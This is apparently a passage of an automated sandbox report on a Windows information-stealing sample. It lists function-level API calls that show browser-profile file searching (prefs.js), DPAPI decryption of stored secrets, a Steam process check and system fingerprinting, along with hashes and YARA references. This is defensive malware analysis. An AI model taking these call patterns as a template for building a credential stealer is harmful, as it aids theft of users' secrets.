                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                              • String ID: prefs.js
                                                                                                                                                                                                              • API String ID: 893096357-3783873740
                                                                                                                                                                                                              • Opcode ID: e685619315c71d7575525aaa6fdc94f4260a41f62e6b904b44cb0551ed5b46f7
                                                                                                                                                                                                              • Instruction ID: f5ffe915ce050132f3454f42d6fbb367bcbfbde8f94d9fcbab433429a25e66e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e685619315c71d7575525aaa6fdc94f4260a41f62e6b904b44cb0551ed5b46f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DA1F8359002289BDB61FB25ED46BCDB774AF85311F4141E1B948B7266EB30AFC98F81
                                                                                                                                                                                                              Function 0092B5B4 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095741C,00956822,?,?,?), ref: 0092B62C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957420), ref: 0092B64D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957424), ref: 0092B667
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957428,?,00956823), ref: 0092B6F4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092B755
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 0092ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0092AC5F
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 0092B8C0
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092B8D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3801961486-0
                                                                                                                                                                                                              • Opcode ID: 6e1667887a0f1b1aa86a5cdf1503e40aa5b2ad1eea5a75637af89b894205b60b
                                                                                                                                                                                                              • Instruction ID: b66a6c3a31e4b9b91d6c59cf392b46f1c72933c696762f22bb77013f4515bb48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e1667887a0f1b1aa86a5cdf1503e40aa5b2ad1eea5a75637af89b894205b60b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D18107359001289BCB60FB31ED4ABDC77B8AF88300F4502A5FD48A3255EB349E99CF91
                                                                                                                                                                                                              Function 0093247D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00932487
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009324A9
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 009324B9
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 009324CB
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 009324DD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 009324F6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID: steam.exe
                                                                                                                                                                                                              • API String ID: 1799959500-2826358650
                                                                                                                                                                                                              • Opcode ID: 44f02403f5d55860142d881c78def9008c0fb505808c2667c7cbc30665ad45ad
                                                                                                                                                                                                              • Instruction ID: f499d94f126d5fa354641432d0a2c1b3fdf5bc75b08c1b437a13d9e5e0a671a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f02403f5d55860142d881c78def9008c0fb505808c2667c7cbc30665ad45ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25012870A01229ABEB609F649C49FDEB7FCAF48751F0401E5A41DE71A0EB34CB819F20
                                                                                                                                                                                                              Function 00930DB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0095670A,?,?), ref: 00930DE1
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00930DEF
                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00930DFD
                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00930E2C
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00930ED4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                              • API String ID: 507856799-4001269591
                                                                                                                                                                                                              • Opcode ID: c2b9b9c9468d1b6eb430b5b48b58c4762a0ebf40f13df005fdc73f181907182e
                                                                                                                                                                                                              • Instruction ID: 43ff28d1db6510dfb5a4de9138fb273ba0cca28f6146bc33d6e84c425bd8f3ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2b9b9c9468d1b6eb430b5b48b58c4762a0ebf40f13df005fdc73f181907182e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7311C75900228ABDB20EB64DC99B9EB3B8BF88300F1045E5F559B7152CB74AEC58F50
                                                                                                                                                                                                              Function 00932554 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 0093255E
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00937FBD,.exe,00956CD4,00956CD0,00956CCC,00956CC8,00956CC4,00956CC0,00956CBC,00956CB8,00956CB4,00956CB0,00956CAC), ref: 0093257D
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 0093258D
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0093259F
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009325B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 009325C5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1799959500-0
                                                                                                                                                                                                              • Opcode ID: 382c22e7a2daf1e16b47f1714d4baa9ef0a924ada10740ec3c02816f0f53910c
                                                                                                                                                                                                              • Instruction ID: 6670c8e86019b6d3f6446cffaf9ec61a50b3f64f5e0246572970c963185d8aa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 382c22e7a2daf1e16b47f1714d4baa9ef0a924ada10740ec3c02816f0f53910c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07013C755052659FEB219B608C18FEE7BBD9F09701F0400E9F41DE71A2EA74CB809F25
                                                                                                                                                                                                              Function 009310EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 00931106
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0093110D
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00931129
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093114F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                              • String ID: %d MB
                                                                                                                                                                                                              • API String ID: 3644086013-2651807785
                                                                                                                                                                                                              • Opcode ID: bb33131eddfe33fc3cc99bd8002b419425fe8d1a5578aa2f37ea5271357f7031
                                                                                                                                                                                                              • Instruction ID: e81e69deef7f4c3271a643621a0f06b4ca1739211f6108e3afedbb3009a5eb2f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb33131eddfe33fc3cc99bd8002b419425fe8d1a5578aa2f37ea5271357f7031
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C701F9B1A01218ABF704DFB4DC46AEE77B8EF08700F400065F506E7290DE70DD818B54
                                                                                                                                                                                                              Function 009280A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0092823B), ref: 009280C4
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,0092823B,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280D8
                                                                                                                                                                                                              • LocalFree.KERNEL32(0092CB6A,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                              • String ID: DPAPI
                                                                                                                                                                                                              • API String ID: 2068576380-1690256801
                                                                                                                                                                                                              • Opcode ID: 5baa0c0bf8d3108470a2b1266d897847be5e0e4b4e10d0df0675fb7199f9374d
                                                                                                                                                                                                              • Instruction ID: d79e46a209726d8211e99da78ce11d813d61fbbc0b3e90f938ff54f942d6d7bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5baa0c0bf8d3108470a2b1266d897847be5e0e4b4e10d0df0675fb7199f9374d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3901EC75A01218EFCB00DFA8D8848AEBBBDFF4C714B108465E916E7310DB719E45CB90
                                                                                                                                                                                                              Function 0093147A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0095670F,?,?), ref: 009314A9
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 009314B9
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00931517
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00931522
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 907984538-0
                                                                                                                                                                                                              • Opcode ID: d6ee1b0283a6f0c761e8956e8c69b3c11b0cb58c9fc4b5cc5c0e3314160fd948
                                                                                                                                                                                                              • Instruction ID: 50e7223965fb4ad4b1b6cce48e443a175e0f8aa2b6323b2ee9f8624311b964a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6ee1b0283a6f0c761e8956e8c69b3c11b0cb58c9fc4b5cc5c0e3314160fd948
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A91170756002189BD721BB659C95BEE73ACAF88700F000195B80AA72A2DF74EE858F51
                                                                                                                                                                                                              Function 00930D03 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00930D1E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00930D25
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00930D34
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930D52
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                              • Opcode ID: 71c576f2cfcc3d101a8d1ed662c8db342be0146899afe5457e011ed607920cc4
                                                                                                                                                                                                              • Instruction ID: 481e372f62986c4eb6eb0152c245b2cef945a8771fb1493f9441f39811fd3f3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71c576f2cfcc3d101a8d1ed662c8db342be0146899afe5457e011ed607920cc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BF0E071601314ABE700DB74EC4AB5F37A89F48725F000295F525DB1D0DF70DD858B95
                                                                                                                                                                                                              Function 00930C28 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                              • Opcode ID: 09e67a6485aac39a2c4776809e15c212d81d54a2387c65150904f2b50b36cd83
                                                                                                                                                                                                              • Instruction ID: a8af6560e8d5919ac14cb12c446ce2c7145fda9d5fd59845a7c3174213569db4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09e67a6485aac39a2c4776809e15c212d81d54a2387c65150904f2b50b36cd83
